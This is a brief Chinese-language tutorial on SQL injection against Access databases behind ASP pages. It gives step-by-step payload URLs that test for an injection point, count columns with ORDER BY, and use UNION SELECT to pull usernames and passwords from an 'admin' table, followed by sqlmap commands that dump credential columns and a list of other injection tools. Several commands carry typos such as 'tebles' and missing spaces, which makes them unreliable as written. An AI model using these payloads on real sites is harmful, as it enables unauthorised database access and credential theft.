access注入及工具使用

Access数据结构：

 Access数据库

          表名

                列名

                     数据

Access注入：

  首先判断是否有注入点：

  http://www.xxx.com/xxx.asp?id=166’(页面返回错误)

http://www.xxx.com/xxx.asp?id=166and 1=1(页面返回正常)

  http://www.xxx.com/xxx.asp?id=166and 1=2 (页面返回错误)

Order by：

例如：http://www.xxx.com/xxx.asp?id=166order by 13 正常

      http://www.xxx.com/xxx.asp?id=166order by 13错误

则代表查询的列名的数目有13个。

猜解表名 确定存在admin表名

http://www.xxx.com/xxx.asp?id=166  UNION SELECT1,2,3,4,5,6,7,8,9,10,11,12,13 fromadmin

猜解列名 猜解数据

http://www.xxx.com/xxx.asp?id=166UNIONSELECT1,2,username ,4,5,6,7,password,9,10,11,12,13 from admin

 

工具使用：sqlmap 啊D 明小子 穿山甲。

工具功能性：支持数据库类型，支持get postcookie注入 注入突破类型 速度快等

例如：明小子

Sqlmap: 命令（Access数据库）:sqlmap.py –u”url”--tebles (查询所有表名)

                   sqlmap.py –u”url” --dump -C”username,password”–T” User”